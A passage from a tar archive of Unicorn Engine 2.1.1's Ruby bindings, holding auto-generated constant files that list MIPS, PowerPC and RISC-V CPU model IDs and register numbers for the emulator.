UC_MIPS_REG_HI = 129 UC_MIPS_REG_LO = 130 UC_MIPS_REG_P0 = 131 UC_MIPS_REG_P1 = 132 UC_MIPS_REG_P2 = 133 UC_MIPS_REG_MPL0 = 134 UC_MIPS_REG_MPL1 = 135 UC_MIPS_REG_MPL2 = 136 UC_MIPS_REG_CP0_CONFIG3 = 137 UC_MIPS_REG_CP0_USERLOCAL = 138 UC_MIPS_REG_CP0_STATUS = 139 UC_MIPS_REG_ENDING = 140 UC_MIPS_REG_ZERO = 2 UC_MIPS_REG_AT = 3 UC_MIPS_REG_V0 = 4 UC_MIPS_REG_V1 = 5 UC_MIPS_REG_A0 = 6 UC_MIPS_REG_A1 = 7 UC_MIPS_REG_A2 = 8 UC_MIPS_REG_A3 = 9 UC_MIPS_REG_T0 = 10 UC_MIPS_REG_T1 = 11 UC_MIPS_REG_T2 = 12 UC_MIPS_REG_T3 = 13 UC_MIPS_REG_T4 = 14 UC_MIPS_REG_T5 = 15 UC_MIPS_REG_T6 = 16 UC_MIPS_REG_T7 = 17 UC_MIPS_REG_S0 = 18 UC_MIPS_REG_S1 = 19 UC_MIPS_REG_S2 = 20 UC_MIPS_REG_S3 = 21 UC_MIPS_REG_S4 = 22 UC_MIPS_REG_S5 = 23 UC_MIPS_REG_S6 = 24 UC_MIPS_REG_S7 = 25 UC_MIPS_REG_T8 = 26 UC_MIPS_REG_T9 = 27 UC_MIPS_REG_K0 = 28 UC_MIPS_REG_K1 = 29 UC_MIPS_REG_GP = 30 UC_MIPS_REG_SP = 31 UC_MIPS_REG_FP = 32 UC_MIPS_REG_S8 = 32 UC_MIPS_REG_RA = 33 UC_MIPS_REG_HI0 = 45 UC_MIPS_REG_HI1 = 46 UC_MIPS_REG_HI2 = 47 UC_MIPS_REG_HI3 = 48 UC_MIPS_REG_LO0 = 45 UC_MIPS_REG_LO1 = 46 UC_MIPS_REG_LO2 = 47 UC_MIPS_REG_LO3 = 48 end����unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/ppc_const.rb�����������������������������0000664�0000000�0000000�00000025215�14675241067�0026361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.rb] module UnicornEngine # PPC CPU UC_CPU_PPC32_401 = 0 UC_CPU_PPC32_401A1 = 1 UC_CPU_PPC32_401B2 = 2 UC_CPU_PPC32_401C2 = 3 UC_CPU_PPC32_401D2 = 4 UC_CPU_PPC32_401E2 = 5 UC_CPU_PPC32_401F2 = 6 UC_CPU_PPC32_401G2 = 7 UC_CPU_PPC32_IOP480 = 8 UC_CPU_PPC32_COBRA = 9 UC_CPU_PPC32_403GA = 10 UC_CPU_PPC32_403GB = 11 UC_CPU_PPC32_403GC = 12 UC_CPU_PPC32_403GCX = 13 UC_CPU_PPC32_405D2 = 14 UC_CPU_PPC32_405D4 = 15 UC_CPU_PPC32_405CRA = 16 UC_CPU_PPC32_405CRB = 17 UC_CPU_PPC32_405CRC = 18 UC_CPU_PPC32_405EP = 19 UC_CPU_PPC32_405EZ = 20 UC_CPU_PPC32_405GPA = 21 UC_CPU_PPC32_405GPB = 22 UC_CPU_PPC32_405GPC = 23 UC_CPU_PPC32_405GPD = 24 UC_CPU_PPC32_405GPR = 25 UC_CPU_PPC32_405LP = 26 UC_CPU_PPC32_NPE405H = 27 UC_CPU_PPC32_NPE405H2 = 28 UC_CPU_PPC32_NPE405L = 29 UC_CPU_PPC32_NPE4GS3 = 30 UC_CPU_PPC32_STB03 = 31 UC_CPU_PPC32_STB04 = 32 UC_CPU_PPC32_STB25 = 33 UC_CPU_PPC32_X2VP4 = 34 UC_CPU_PPC32_X2VP20 = 35 UC_CPU_PPC32_440_XILINX = 36 UC_CPU_PPC32_440_XILINX_W_DFPU = 37 UC_CPU_PPC32_440EPA = 38 UC_CPU_PPC32_440EPB = 39 UC_CPU_PPC32_440EPX = 40 UC_CPU_PPC32_460EXB = 41 UC_CPU_PPC32_G2 = 42 UC_CPU_PPC32_G2H4 = 43 UC_CPU_PPC32_G2GP = 44 UC_CPU_PPC32_G2LS = 45 UC_CPU_PPC32_G2HIP3 = 46 UC_CPU_PPC32_G2HIP4 = 47 UC_CPU_PPC32_MPC603 = 48 UC_CPU_PPC32_G2LE = 49 UC_CPU_PPC32_G2LEGP = 50 UC_CPU_PPC32_G2LELS = 51 UC_CPU_PPC32_G2LEGP1 = 52 UC_CPU_PPC32_G2LEGP3 = 53 UC_CPU_PPC32_MPC5200_V10 = 54 UC_CPU_PPC32_MPC5200_V11 = 55 UC_CPU_PPC32_MPC5200_V12 = 56 UC_CPU_PPC32_MPC5200B_V20 = 57 UC_CPU_PPC32_MPC5200B_V21 = 58 UC_CPU_PPC32_E200Z5 = 59 UC_CPU_PPC32_E200Z6 = 60 UC_CPU_PPC32_E300C1 = 61 UC_CPU_PPC32_E300C2 = 62 UC_CPU_PPC32_E300C3 = 63 UC_CPU_PPC32_E300C4 = 64 UC_CPU_PPC32_MPC8343 = 65 UC_CPU_PPC32_MPC8343A = 66 UC_CPU_PPC32_MPC8343E = 67 UC_CPU_PPC32_MPC8343EA = 68 UC_CPU_PPC32_MPC8347T = 69 UC_CPU_PPC32_MPC8347P = 70 UC_CPU_PPC32_MPC8347AT = 71 UC_CPU_PPC32_MPC8347AP = 72 UC_CPU_PPC32_MPC8347ET = 73 UC_CPU_PPC32_MPC8347EP = 74 UC_CPU_PPC32_MPC8347EAT = 75 UC_CPU_PPC32_MPC8347EAP = 76 UC_CPU_PPC32_MPC8349 = 77 UC_CPU_PPC32_MPC8349A = 78 UC_CPU_PPC32_MPC8349E = 79 UC_CPU_PPC32_MPC8349EA = 80 UC_CPU_PPC32_MPC8377 = 81 UC_CPU_PPC32_MPC8377E = 82 UC_CPU_PPC32_MPC8378 = 83 UC_CPU_PPC32_MPC8378E = 84 UC_CPU_PPC32_MPC8379 = 85 UC_CPU_PPC32_MPC8379E = 86 UC_CPU_PPC32_E500_V10 = 87 UC_CPU_PPC32_E500_V20 = 88 UC_CPU_PPC32_E500V2_V10 = 89 UC_CPU_PPC32_E500V2_V20 = 90 UC_CPU_PPC32_E500V2_V21 = 91 UC_CPU_PPC32_E500V2_V22 = 92 UC_CPU_PPC32_E500V2_V30 = 93 UC_CPU_PPC32_E500MC = 94 UC_CPU_PPC32_MPC8533_V10 = 95 UC_CPU_PPC32_MPC8533_V11 = 96 UC_CPU_PPC32_MPC8533E_V10 = 97 UC_CPU_PPC32_MPC8533E_V11 = 98 UC_CPU_PPC32_MPC8540_V10 = 99 UC_CPU_PPC32_MPC8540_V20 = 100 UC_CPU_PPC32_MPC8540_V21 = 101 UC_CPU_PPC32_MPC8541_V10 = 102 UC_CPU_PPC32_MPC8541_V11 = 103 UC_CPU_PPC32_MPC8541E_V10 = 104 UC_CPU_PPC32_MPC8541E_V11 = 105 UC_CPU_PPC32_MPC8543_V10 = 106 UC_CPU_PPC32_MPC8543_V11 = 107 UC_CPU_PPC32_MPC8543_V20 = 108 UC_CPU_PPC32_MPC8543_V21 = 109 UC_CPU_PPC32_MPC8543E_V10 = 110 UC_CPU_PPC32_MPC8543E_V11 = 111 UC_CPU_PPC32_MPC8543E_V20 = 112 UC_CPU_PPC32_MPC8543E_V21 = 113 UC_CPU_PPC32_MPC8544_V10 = 114 UC_CPU_PPC32_MPC8544_V11 = 115 UC_CPU_PPC32_MPC8544E_V10 = 116 UC_CPU_PPC32_MPC8544E_V11 = 117 UC_CPU_PPC32_MPC8545_V20 = 118 UC_CPU_PPC32_MPC8545_V21 = 119 UC_CPU_PPC32_MPC8545E_V20 = 120 UC_CPU_PPC32_MPC8545E_V21 = 121 UC_CPU_PPC32_MPC8547E_V20 = 122 UC_CPU_PPC32_MPC8547E_V21 = 123 UC_CPU_PPC32_MPC8548_V10 = 124 UC_CPU_PPC32_MPC8548_V11 = 125 UC_CPU_PPC32_MPC8548_V20 = 126 UC_CPU_PPC32_MPC8548_V21 = 127 UC_CPU_PPC32_MPC8548E_V10 = 128 UC_CPU_PPC32_MPC8548E_V11 = 129 UC_CPU_PPC32_MPC8548E_V20 = 130 UC_CPU_PPC32_MPC8548E_V21 = 131 UC_CPU_PPC32_MPC8555_V10 = 132 UC_CPU_PPC32_MPC8555_V11 = 133 UC_CPU_PPC32_MPC8555E_V10 = 134 UC_CPU_PPC32_MPC8555E_V11 = 135 UC_CPU_PPC32_MPC8560_V10 = 136 UC_CPU_PPC32_MPC8560_V20 = 137 UC_CPU_PPC32_MPC8560_V21 = 138 UC_CPU_PPC32_MPC8567 = 139 UC_CPU_PPC32_MPC8567E = 140 UC_CPU_PPC32_MPC8568 = 141 UC_CPU_PPC32_MPC8568E = 142 UC_CPU_PPC32_MPC8572 = 143 UC_CPU_PPC32_MPC8572E = 144 UC_CPU_PPC32_E600 = 145 UC_CPU_PPC32_MPC8610 = 146 UC_CPU_PPC32_MPC8641 = 147 UC_CPU_PPC32_MPC8641D = 148 UC_CPU_PPC32_601_V0 = 149 UC_CPU_PPC32_601_V1 = 150 UC_CPU_PPC32_601_V2 = 151 UC_CPU_PPC32_602 = 152 UC_CPU_PPC32_603 = 153 UC_CPU_PPC32_603E_V1_1 = 154 UC_CPU_PPC32_603E_V1_2 = 155 UC_CPU_PPC32_603E_V1_3 = 156 UC_CPU_PPC32_603E_V1_4 = 157 UC_CPU_PPC32_603E_V2_2 = 158 UC_CPU_PPC32_603E_V3 = 159 UC_CPU_PPC32_603E_V4 = 160 UC_CPU_PPC32_603E_V4_1 = 161 UC_CPU_PPC32_603E7 = 162 UC_CPU_PPC32_603E7T = 163 UC_CPU_PPC32_603E7V = 164 UC_CPU_PPC32_603E7V1 = 165 UC_CPU_PPC32_603E7V2 = 166 UC_CPU_PPC32_603P = 167 UC_CPU_PPC32_604 = 168 UC_CPU_PPC32_604E_V1_0 = 169 UC_CPU_PPC32_604E_V2_2 = 170 UC_CPU_PPC32_604E_V2_4 = 171 UC_CPU_PPC32_604R = 172 UC_CPU_PPC32_740_V1_0 = 173 UC_CPU_PPC32_750_V1_0 = 174 UC_CPU_PPC32_740_V2_0 = 175 UC_CPU_PPC32_750_V2_0 = 176 UC_CPU_PPC32_740_V2_1 = 177 UC_CPU_PPC32_750_V2_1 = 178 UC_CPU_PPC32_740_V2_2 = 179 UC_CPU_PPC32_750_V2_2 = 180 UC_CPU_PPC32_740_V3_0 = 181 UC_CPU_PPC32_750_V3_0 = 182 UC_CPU_PPC32_740_V3_1 = 183 UC_CPU_PPC32_750_V3_1 = 184 UC_CPU_PPC32_740E = 185 UC_CPU_PPC32_750E = 186 UC_CPU_PPC32_740P = 187 UC_CPU_PPC32_750P = 188 UC_CPU_PPC32_750CL_V1_0 = 189 UC_CPU_PPC32_750CL_V2_0 = 190 UC_CPU_PPC32_750CX_V1_0 = 191 UC_CPU_PPC32_750CX_V2_0 = 192 UC_CPU_PPC32_750CX_V2_1 = 193 UC_CPU_PPC32_750CX_V2_2 = 194 UC_CPU_PPC32_750CXE_V2_1 = 195 UC_CPU_PPC32_750CXE_V2_2 = 196 UC_CPU_PPC32_750CXE_V2_3 = 197 UC_CPU_PPC32_750CXE_V2_4 = 198 UC_CPU_PPC32_750CXE_V2_4B = 199 UC_CPU_PPC32_750CXE_V3_0 = 200 UC_CPU_PPC32_750CXE_V3_1 = 201 UC_CPU_PPC32_750CXE_V3_1B = 202 UC_CPU_PPC32_750CXR = 203 UC_CPU_PPC32_750FL = 204 UC_CPU_PPC32_750FX_V1_0 = 205 UC_CPU_PPC32_750FX_V2_0 = 206 UC_CPU_PPC32_750FX_V2_1 = 207 UC_CPU_PPC32_750FX_V2_2 = 208 UC_CPU_PPC32_750FX_V2_3 = 209 UC_CPU_PPC32_750GL = 210 UC_CPU_PPC32_750GX_V1_0 = 211 UC_CPU_PPC32_750GX_V1_1 = 212 UC_CPU_PPC32_750GX_V1_2 = 213 UC_CPU_PPC32_750L_V2_0 = 214 UC_CPU_PPC32_750L_V2_1 = 215 UC_CPU_PPC32_750L_V2_2 = 216 UC_CPU_PPC32_750L_V3_0 = 217 UC_CPU_PPC32_750L_V3_2 = 218 UC_CPU_PPC32_745_V1_0 = 219 UC_CPU_PPC32_755_V1_0 = 220 UC_CPU_PPC32_745_V1_1 = 221 UC_CPU_PPC32_755_V1_1 = 222 UC_CPU_PPC32_745_V2_0 = 223 UC_CPU_PPC32_755_V2_0 = 224 UC_CPU_PPC32_745_V2_1 = 225 UC_CPU_PPC32_755_V2_1 = 226 UC_CPU_PPC32_745_V2_2 = 227 UC_CPU_PPC32_755_V2_2 = 228 UC_CPU_PPC32_745_V2_3 = 229 UC_CPU_PPC32_755_V2_3 = 230 UC_CPU_PPC32_745_V2_4 = 231 UC_CPU_PPC32_755_V2_4 = 232 UC_CPU_PPC32_745_V2_5 = 233 UC_CPU_PPC32_755_V2_5 = 234 UC_CPU_PPC32_745_V2_6 = 235 UC_CPU_PPC32_755_V2_6 = 236 UC_CPU_PPC32_745_V2_7 = 237 UC_CPU_PPC32_755_V2_7 = 238 UC_CPU_PPC32_745_V2_8 = 239 UC_CPU_PPC32_755_V2_8 = 240 UC_CPU_PPC32_7400_V1_0 = 241 UC_CPU_PPC32_7400_V1_1 = 242 UC_CPU_PPC32_7400_V2_0 = 243 UC_CPU_PPC32_7400_V2_1 = 244 UC_CPU_PPC32_7400_V2_2 = 245 UC_CPU_PPC32_7400_V2_6 = 246 UC_CPU_PPC32_7400_V2_7 = 247 UC_CPU_PPC32_7400_V2_8 = 248 UC_CPU_PPC32_7400_V2_9 = 249 UC_CPU_PPC32_7410_V1_0 = 250 UC_CPU_PPC32_7410_V1_1 = 251 UC_CPU_PPC32_7410_V1_2 = 252 UC_CPU_PPC32_7410_V1_3 = 253 UC_CPU_PPC32_7410_V1_4 = 254 UC_CPU_PPC32_7448_V1_0 = 255 UC_CPU_PPC32_7448_V1_1 = 256 UC_CPU_PPC32_7448_V2_0 = 257 UC_CPU_PPC32_7448_V2_1 = 258 UC_CPU_PPC32_7450_V1_0 = 259 UC_CPU_PPC32_7450_V1_1 = 260 UC_CPU_PPC32_7450_V1_2 = 261 UC_CPU_PPC32_7450_V2_0 = 262 UC_CPU_PPC32_7450_V2_1 = 263 UC_CPU_PPC32_7441_V2_1 = 264 UC_CPU_PPC32_7441_V2_3 = 265 UC_CPU_PPC32_7451_V2_3 = 266 UC_CPU_PPC32_7441_V2_10 = 267 UC_CPU_PPC32_7451_V2_10 = 268 UC_CPU_PPC32_7445_V1_0 = 269 UC_CPU_PPC32_7455_V1_0 = 270 UC_CPU_PPC32_7445_V2_1 = 271 UC_CPU_PPC32_7455_V2_1 = 272 UC_CPU_PPC32_7445_V3_2 = 273 UC_CPU_PPC32_7455_V3_2 = 274 UC_CPU_PPC32_7445_V3_3 = 275 UC_CPU_PPC32_7455_V3_3 = 276 UC_CPU_PPC32_7445_V3_4 = 277 UC_CPU_PPC32_7455_V3_4 = 278 UC_CPU_PPC32_7447_V1_0 = 279 UC_CPU_PPC32_7457_V1_0 = 280 UC_CPU_PPC32_7447_V1_1 = 281 UC_CPU_PPC32_7457_V1_1 = 282 UC_CPU_PPC32_7457_V1_2 = 283 UC_CPU_PPC32_7447A_V1_0 = 284 UC_CPU_PPC32_7457A_V1_0 = 285 UC_CPU_PPC32_7447A_V1_1 = 286 UC_CPU_PPC32_7457A_V1_1 = 287 UC_CPU_PPC32_7447A_V1_2 = 288 UC_CPU_PPC32_7457A_V1_2 = 289 UC_CPU_PPC32_ENDING = 290 # PPC64 CPU UC_CPU_PPC64_E5500 = 0 UC_CPU_PPC64_E6500 = 1 UC_CPU_PPC64_970_V2_2 = 2 UC_CPU_PPC64_970FX_V1_0 = 3 UC_CPU_PPC64_970FX_V2_0 = 4 UC_CPU_PPC64_970FX_V2_1 = 5 UC_CPU_PPC64_970FX_V3_0 = 6 UC_CPU_PPC64_970FX_V3_1 = 7 UC_CPU_PPC64_970MP_V1_0 = 8 UC_CPU_PPC64_970MP_V1_1 = 9 UC_CPU_PPC64_POWER5_V2_1 = 10 UC_CPU_PPC64_POWER7_V2_3 = 11 UC_CPU_PPC64_POWER7_V2_1 = 12 UC_CPU_PPC64_POWER8E_V2_1 = 13 UC_CPU_PPC64_POWER8_V2_0 = 14 UC_CPU_PPC64_POWER8NVL_V1_0 = 15 UC_CPU_PPC64_POWER9_V1_0 = 16 UC_CPU_PPC64_POWER9_V2_0 = 17 UC_CPU_PPC64_POWER10_V1_0 = 18 UC_CPU_PPC64_ENDING = 19 # PPC registers UC_PPC_REG_INVALID = 0 # General purpose registers UC_PPC_REG_PC = 1 UC_PPC_REG_0 = 2 UC_PPC_REG_1 = 3 UC_PPC_REG_2 = 4 UC_PPC_REG_3 = 5 UC_PPC_REG_4 = 6 UC_PPC_REG_5 = 7 UC_PPC_REG_6 = 8 UC_PPC_REG_7 = 9 UC_PPC_REG_8 = 10 UC_PPC_REG_9 = 11 UC_PPC_REG_10 = 12 UC_PPC_REG_11 = 13 UC_PPC_REG_12 = 14 UC_PPC_REG_13 = 15 UC_PPC_REG_14 = 16 UC_PPC_REG_15 = 17 UC_PPC_REG_16 = 18 UC_PPC_REG_17 = 19 UC_PPC_REG_18 = 20 UC_PPC_REG_19 = 21 UC_PPC_REG_20 = 22 UC_PPC_REG_21 = 23 UC_PPC_REG_22 = 24 UC_PPC_REG_23 = 25 UC_PPC_REG_24 = 26 UC_PPC_REG_25 = 27 UC_PPC_REG_26 = 28 UC_PPC_REG_27 = 29 UC_PPC_REG_28 = 30 UC_PPC_REG_29 = 31 UC_PPC_REG_30 = 32 UC_PPC_REG_31 = 33 UC_PPC_REG_CR0 = 34 UC_PPC_REG_CR1 = 35 UC_PPC_REG_CR2 = 36 UC_PPC_REG_CR3 = 37 UC_PPC_REG_CR4 = 38 UC_PPC_REG_CR5 = 39 UC_PPC_REG_CR6 = 40 UC_PPC_REG_CR7 = 41 UC_PPC_REG_FPR0 = 42 UC_PPC_REG_FPR1 = 43 UC_PPC_REG_FPR2 = 44 UC_PPC_REG_FPR3 = 45 UC_PPC_REG_FPR4 = 46 UC_PPC_REG_FPR5 = 47 UC_PPC_REG_FPR6 = 48 UC_PPC_REG_FPR7 = 49 UC_PPC_REG_FPR8 = 50 UC_PPC_REG_FPR9 = 51 UC_PPC_REG_FPR10 = 52 UC_PPC_REG_FPR11 = 53 UC_PPC_REG_FPR12 = 54 UC_PPC_REG_FPR13 = 55 UC_PPC_REG_FPR14 = 56 UC_PPC_REG_FPR15 = 57 UC_PPC_REG_FPR16 = 58 UC_PPC_REG_FPR17 = 59 UC_PPC_REG_FPR18 = 60 UC_PPC_REG_FPR19 = 61 UC_PPC_REG_FPR20 = 62 UC_PPC_REG_FPR21 = 63 UC_PPC_REG_FPR22 = 64 UC_PPC_REG_FPR23 = 65 UC_PPC_REG_FPR24 = 66 UC_PPC_REG_FPR25 = 67 UC_PPC_REG_FPR26 = 68 UC_PPC_REG_FPR27 = 69 UC_PPC_REG_FPR28 = 70 UC_PPC_REG_FPR29 = 71 UC_PPC_REG_FPR30 = 72 UC_PPC_REG_FPR31 = 73 UC_PPC_REG_LR = 74 UC_PPC_REG_XER = 75 UC_PPC_REG_CTR = 76 UC_PPC_REG_MSR = 77 UC_PPC_REG_FPSCR = 78 UC_PPC_REG_CR = 79 UC_PPC_REG_ENDING = 80 end�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/riscv_const.rb���������������������������0000664�0000000�0000000�00000016124�14675241067�0026724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.rb] module UnicornEngine # RISCV32 CPU UC_CPU_RISCV32_ANY = 0 UC_CPU_RISCV32_BASE32 = 1 UC_CPU_RISCV32_SIFIVE_E31 = 2 UC_CPU_RISCV32_SIFIVE_U34 = 3 UC_CPU_RISCV32_ENDING = 4 # RISCV64 CPU UC_CPU_RISCV64_ANY = 0 UC_CPU_RISCV64_BASE64 = 1 UC_CPU_RISCV64_SIFIVE_E51 = 2 UC_CPU_RISCV64_SIFIVE_U54 = 3 UC_CPU_RISCV64_ENDING = 4 # RISCV registers UC_RISCV_REG_INVALID = 0 # General purpose registers UC_RISCV_REG_X0 = 1 UC_RISCV_REG_X1 = 2 UC_RISCV_REG_X2 = 3 UC_RISCV_REG_X3 = 4 UC_RISCV_REG_X4 = 5 UC_RISCV_REG_X5 = 6 UC_RISCV_REG_X6 = 7 UC_RISCV_REG_X7 = 8 UC_RISCV_REG_X8 = 9 UC_RISCV_REG_X9 = 10 UC_RISCV_REG_X10 = 11 UC_RISCV_REG_X11 = 12 UC_RISCV_REG_X12 = 13 UC_RISCV_REG_X13 = 14 UC_RISCV_REG_X14 = 15 UC_RISCV_REG_X15 = 16 UC_RISCV_REG_X16 = 17 UC_RISCV_REG_X17 = 18 UC_RISCV_REG_X18 = 19 UC_RISCV_REG_X19 = 20 UC_RISCV_REG_X20 = 21 UC_RISCV_REG_X21 = 22 UC_RISCV_REG_X22 = 23 UC_RISCV_REG_X23 = 24 UC_RISCV_REG_X24 = 25 UC_RISCV_REG_X25 = 26 UC_RISCV_REG_X26 = 27 UC_RISCV_REG_X27 = 28 UC_RISCV_REG_X28 = 29 UC_RISCV_REG_X29 = 30 UC_RISCV_REG_X30 = 31 UC_RISCV_REG_X31 = 32 # RISCV CSR UC_RISCV_REG_USTATUS = 33 UC_RISCV_REG_UIE = 34 UC_RISCV_REG_UTVEC = 35 UC_RISCV_REG_USCRATCH = 36 UC_RISCV_REG_UEPC = 37 UC_RISCV_REG_UCAUSE = 38 UC_RISCV_REG_UTVAL = 39 UC_RISCV_REG_UIP = 40 UC_RISCV_REG_FFLAGS = 41 UC_RISCV_REG_FRM = 42 UC_RISCV_REG_FCSR = 43 UC_RISCV_REG_CYCLE = 44 UC_RISCV_REG_TIME = 45 UC_RISCV_REG_INSTRET = 46 UC_RISCV_REG_HPMCOUNTER3 = 47 UC_RISCV_REG_HPMCOUNTER4 = 48 UC_RISCV_REG_HPMCOUNTER5 = 49 UC_RISCV_REG_HPMCOUNTER6 = 50 UC_RISCV_REG_HPMCOUNTER7 = 51 UC_RISCV_REG_HPMCOUNTER8 = 52 UC_RISCV_REG_HPMCOUNTER9 = 53 UC_RISCV_REG_HPMCOUNTER10 = 54 UC_RISCV_REG_HPMCOUNTER11 = 55 UC_RISCV_REG_HPMCOUNTER12 = 56 UC_RISCV_REG_HPMCOUNTER13 = 57 UC_RISCV_REG_HPMCOUNTER14 = 58 UC_RISCV_REG_HPMCOUNTER15 = 59 UC_RISCV_REG_HPMCOUNTER16 = 60 UC_RISCV_REG_HPMCOUNTER17 = 61 UC_RISCV_REG_HPMCOUNTER18 = 62 UC_RISCV_REG_HPMCOUNTER19 = 63 UC_RISCV_REG_HPMCOUNTER20 = 64 UC_RISCV_REG_HPMCOUNTER21 = 65 UC_RISCV_REG_HPMCOUNTER22 = 66 UC_RISCV_REG_HPMCOUNTER23 = 67 UC_RISCV_REG_HPMCOUNTER24 = 68 UC_RISCV_REG_HPMCOUNTER25 = 69 UC_RISCV_REG_HPMCOUNTER26 = 70 UC_RISCV_REG_HPMCOUNTER27 = 71 UC_RISCV_REG_HPMCOUNTER28 = 72 UC_RISCV_REG_HPMCOUNTER29 = 73 UC_RISCV_REG_HPMCOUNTER30 = 74 UC_RISCV_REG_HPMCOUNTER31 = 75 UC_RISCV_REG_CYCLEH = 76 UC_RISCV_REG_TIMEH = 77 UC_RISCV_REG_INSTRETH = 78 UC_RISCV_REG_HPMCOUNTER3H = 79 UC_RISCV_REG_HPMCOUNTER4H = 80 UC_RISCV_REG_HPMCOUNTER5H = 81 UC_RISCV_REG_HPMCOUNTER6H = 82 UC_RISCV_REG_HPMCOUNTER7H = 83 UC_RISCV_REG_HPMCOUNTER8H = 84 UC_RISCV_REG_HPMCOUNTER9H = 85 UC_RISCV_REG_HPMCOUNTER10H = 86 UC_RISCV_REG_HPMCOUNTER11H = 87 UC_RISCV_REG_HPMCOUNTER12H = 88 UC_RISCV_REG_HPMCOUNTER13H = 89 UC_RISCV_REG_HPMCOUNTER14H = 90 UC_RISCV_REG_HPMCOUNTER15H = 91 UC_RISCV_REG_HPMCOUNTER16H = 92 UC_RISCV_REG_HPMCOUNTER17H = 93 UC_RISCV_REG_HPMCOUNTER18H = 94 UC_RISCV_REG_HPMCOUNTER19H = 95 UC_RISCV_REG_HPMCOUNTER20H = 96 UC_RISCV_REG_HPMCOUNTER21H = 97 UC_RISCV_REG_HPMCOUNTER22H = 98 UC_RISCV_REG_HPMCOUNTER23H = 99 UC_RISCV_REG_HPMCOUNTER24H = 100 UC_RISCV_REG_HPMCOUNTER25H = 101 UC_RISCV_REG_HPMCOUNTER26H = 102 UC_RISCV_REG_HPMCOUNTER27H = 103 UC_RISCV_REG_HPMCOUNTER28H = 104 UC_RISCV_REG_HPMCOUNTER29H = 105 UC_RISCV_REG_HPMCOUNTER30H = 106 UC_RISCV_REG_HPMCOUNTER31H = 107 UC_RISCV_REG_MCYCLE = 108 UC_RISCV_REG_MINSTRET = 109 UC_RISCV_REG_MCYCLEH = 110 UC_RISCV_REG_MINSTRETH = 111 UC_RISCV_REG_MVENDORID = 112 UC_RISCV_REG_MARCHID = 113 UC_RISCV_REG_MIMPID = 114 UC_RISCV_REG_MHARTID = 115 UC_RISCV_REG_MSTATUS = 116 UC_RISCV_REG_MISA = 117 UC_RISCV_REG_MEDELEG = 118 UC_RISCV_REG_MIDELEG = 119 UC_RISCV_REG_MIE = 120 UC_RISCV_REG_MTVEC = 121 UC_RISCV_REG_MCOUNTEREN = 122 UC_RISCV_REG_MSTATUSH = 123 UC_RISCV_REG_MUCOUNTEREN = 124 UC_RISCV_REG_MSCOUNTEREN = 125 UC_RISCV_REG_MHCOUNTEREN = 126 UC_RISCV_REG_MSCRATCH = 127 UC_RISCV_REG_MEPC = 128 UC_RISCV_REG_MCAUSE = 129 UC_RISCV_REG_MTVAL = 130 UC_RISCV_REG_MIP = 131 UC_RISCV_REG_MBADADDR = 132 UC_RISCV_REG_SSTATUS = 133 UC_RISCV_REG_SEDELEG = 134 UC_RISCV_REG_SIDELEG = 135 UC_RISCV_REG_SIE = 136 UC_RISCV_REG_STVEC = 137 UC_RISCV_REG_SCOUNTEREN = 138 UC_RISCV_REG_SSCRATCH = 139 UC_RISCV_REG_SEPC = 140 UC_RISCV_REG_SCAUSE = 141 UC_RISCV_REG_STVAL = 142 UC_RISCV_REG_SIP = 143 UC_RISCV_REG_SBADADDR = 144 UC_RISCV_REG_SPTBR = 145 UC_RISCV_REG_SATP = 146 UC_RISCV_REG_HSTATUS = 147 UC_RISCV_REG_HEDELEG = 148 UC_RISCV_REG_HIDELEG = 149 UC_RISCV_REG_HIE = 150 UC_RISCV_REG_HCOUNTEREN = 151 UC_RISCV_REG_HTVAL = 152 UC_RISCV_REG_HIP = 153 UC_RISCV_REG_HTINST = 154 UC_RISCV_REG_HGATP = 155 UC_RISCV_REG_HTIMEDELTA = 156 UC_RISCV_REG_HTIMEDELTAH = 157 # Floating-point registers UC_RISCV_REG_F0 = 158 UC_RISCV_REG_F1 = 159 UC_RISCV_REG_F2 = 160 UC_RISCV_REG_F3 = 161 UC_RISCV_REG_F4 = 162 UC_RISCV_REG_F5 = 163 UC_RISCV_REG_F6 = 164 UC_RISCV_REG_F7 = 165 UC_RISCV_REG_F8 = 166 UC_RISCV_REG_F9 = 167 UC_RISCV_REG_F10 = 168 UC_RISCV_REG_F11 = 169 UC_RISCV_REG_F12 = 170 UC_RISCV_REG_F13 = 171 UC_RISCV_REG_F14 = 172 UC_RISCV_REG_F15 = 173 UC_RISCV_REG_F16 = 174 UC_RISCV_REG_F17 = 175 UC_RISCV_REG_F18 = 176 UC_RISCV_REG_F19 = 177 UC_RISCV_REG_F20 = 178 UC_RISCV_REG_F21 = 179 UC_RISCV_REG_F22 = 180 UC_RISCV_REG_F23 = 181 UC_RISCV_REG_F24 = 182 UC_RISCV_REG_F25 = 183 UC_RISCV_REG_F26 = 184 UC_RISCV_REG_F27 = 185 UC_RISCV_REG_F28 = 186 UC_RISCV_REG_F29 = 187 UC_RISCV_REG_F30 = 188 UC_RISCV_REG_F31 = 189 UC_RISCV_REG_PC = 190 UC_RISCV_REG_ENDING = 191 # Alias registers UC_RISCV_REG_ZERO = 1 UC_RISCV_REG_RA = 2 UC_RISCV_REG_SP = 3 UC_RISCV_REG_GP = 4 UC_RISCV_REG_TP = 5 UC_RISCV_REG_T0 = 6 UC_RISCV_REG_T1 = 7 UC_RISCV_REG_T2 = 8 UC_RISCV_REG_S0 = 9 UC_RISCV_REG_FP = 9 UC_RISCV_REG_S1 = 10 UC_RISCV_REG_A0 = 11 UC_RISCV_REG_A1 = 12 UC_RISCV_REG_A2 = 13 UC_RISCV_REG_A3 = 14 UC_RISCV_REG_A4 = 15 UC_RISCV_REG_A5 = 16 UC_RISCV_REG_A6 = 17 UC_RISCV_REG_A7 = 18 UC_RISCV_REG_S2 = 19 UC_RISCV_REG_S3 = 20 UC_RISCV_REG_S4 = 21 UC_RISCV_REG_S5 = 22 UC_RISCV_REG_S6 = 23 UC_RISCV_REG_S7 = 24 UC_RISCV_REG_S8 = 25 UC_RISCV_REG_S9 = 26 UC_RISCV_REG_S10 = 27 UC_RISCV_REG_S11 = 28 UC_RISCV_REG_T3 = 